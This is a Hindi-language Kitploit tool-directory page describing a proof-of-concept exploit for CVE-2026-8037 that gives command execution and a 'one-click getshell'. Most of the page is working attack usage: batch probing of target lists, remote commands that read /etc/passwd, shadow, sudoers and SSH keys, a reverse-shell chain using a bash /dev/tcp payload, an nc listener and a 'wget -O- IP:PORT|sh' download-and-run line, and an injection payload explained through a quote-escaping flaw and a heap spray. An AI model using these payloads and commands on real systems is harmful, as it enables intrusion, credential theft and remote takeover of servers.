Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-8037-POC — इसमें निष्पादन योग्य कमांड डिटेक्शन और वन-क्लिक getshell शामिल है (सर्वर पर सेवा तैनात करने की आवश्यकता है) | Kitploit
उपकरण/GitHubGitHub/caster-chen/cve-2026-8037-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

इसमें निष्पादन योग्य कमांड डिटेक्शन और वन-क्लिक getshell शामिल है (सर्वर पर सेवा तैनात करने की आवश्यकता है)

रिपॉजिटरी देखें
32 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-8037-POC

इसमें निष्पादित कमांड डिटेक्शन और वन-क्लिक गेटशेल शामिल है (सर्वर पर सेवा तैनाती की आवश्यकता है) pco.yaml को nuclei के साथ उपयोग करके तेजी से डिटेक्ट किया जा सकता है

त्वरित आरंभ

इंटरैक्टिव मोड

root@kitploit:~
python go.py

लक्ष्य URL दर्ज करें → मेनू से फीचर चुनें।

लक्ष्य डिटेक्ट करें

root@kitploit:~
# त्वरित डिटेक्ट (8 बुनियादी जानकारी)
python go.py -t https://IP:PORT --probe fast

# गहन डिटेक्ट (सभी कमांड: 30+ आइटम)
python go.py -t https://IP:PORT --probe deep

# बैच डिटेक्ट
python go.py -f vulnerable_targets.txt --probe fast

कमांड निष्पादित करें

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# बैच समवर्ती (20 थ्रेड)
python go.py -f targets.txt -c "hostname" --batch 20

वन-क्लिक रिवर्स शेल

हमलावर मशीन पर दो टर्मिनल खोलें:

root@kitploit:~
# टर्मिनल 1 - HTTP सेवा (rev.sh प्रदान करता है)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# टर्मिनल 2 - रिवर्स शेल की प्रतीक्षा
nc -lvnp 8088

फिर payload भेजें:

root@kitploit:~
# एकल लक्ष्य
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# बैच (सीरियल, एक बार में केवल एक कनेक्शन)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

स्क्रिप्ट भेजने से पहले तैयारी के चरण प्रिंट करेगी।


गहन डिटेक्शन सामग्री

श्रेणीकमांड
बुनियादी जानकारीhostname, uname -a, kernel, OS release, uptime
उपयोगकर्ताid, whoami, users/w/who
नेटवर्कifconfig, route, arp, listening ports, connections, iptables
सिस्टमprocesses, cpuinfo, meminfo, disk, mount
फ़ाइलेंls / /root /tmp /home /etc
कॉन्फ़िगरेशनcrontab, passwd, shadow, sudoers, SSH keys
एक्सटेंशनconfig search, scripts, docker, containers

इंजेक्शन सिद्धांत

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <कमांड> #", ...}
  • apiuser="''''" escape_quotes() के null टर्मिनेशन दोष को ट्रिगर करता है
  • g0~g60 61 बार हीप स्प्रे करता है, सफलता दर बढ़ाता है
  • '; <कमांड> # संदर्भ बंद करता है, # आगे के भाग को टिप्पणी करता है

लंबाई सीमा

echo tag के बिना 34 वर्ण उपलब्ध:

root@kitploit:~
wget -O- IP:PORT|sh    (31 वर्ण)

पाइपलाइन श्रृंखला: wget डाउनलोड → sh निष्पादन → bash निर्दिष्ट पोर्ट पर रिवर्स शेल भेजता है।


पैरामीटर सारांश

पैरामीटरकार्य
-t, --target URLलक्ष्य पता
-f, --file FILEलक्ष्य सूची फ़ाइल
-l, --lhost IPहमलावर मशीन IP
-p, --lport PORTHTTP सेवा पोर्ट (डिफ़ॉल्ट 8087)
-n, --ncport PORTnc सुनने वाला पोर्ट (डिफ़ॉल्ट 8088)
-c, --cmd CMDकमांड निष्पादित करें
--probe fast/deepत्वरित/गहन डिटेक्ट
--batch Nबैच समवर्ती संख्या (डिफ़ॉल्ट सीरियल)
टूल डाउनलोड करें